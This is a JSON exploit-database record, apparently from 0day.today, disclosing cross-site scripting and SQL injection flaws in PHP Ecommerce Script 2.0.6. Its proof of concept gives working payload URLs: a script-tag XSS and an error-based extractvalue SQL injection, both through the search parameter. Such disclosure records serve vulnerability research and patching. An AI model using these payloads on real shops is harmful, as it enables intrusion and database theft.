{"id": "1337DAY-ID-32275", "bulletinFamily": "exploit", "title": "PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection Vulnerabilities", "description": "Exploit for php platform in category web applications", "published": "2019-02-25T00:00:00", "modified": "2019-02-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/32275", "reporter": "Mr Winst0n", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2019-03-06T00:14:29", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2019-03-06T00:14:29", "rev": 2}, "dependencies": {"references": [], "modified": "2019-03-06T00:14:29", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/32275", "sourceData": "# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection\r\n# Exploit Author: Mr Winst0n\r\n# Author E-mail: manamtabeshekan[@]gmail[.]com\r\n# Discovery Date: February 22, 2019\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/\r\n# Tested Version: 2.0.6\r\n# Tested on: Kali linux, Windows 8.1 \r\n\r\n\r\n# PoC:\r\n\r\n# Cross Site Scripting:\r\n\r\n# http://localhost/[PATH]/?s=[XSS]\r\n# http://localhost/[PATH]/?s=<scRiPt>alert(1)</ScrIpT>\r\n\r\n# SQL Injection:\r\n\r\n# http://localhost/[PATH]/?s=[SQL]\r\n# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version()))\r\n\n\n# 0day.today [2019-03-05] #"}

{}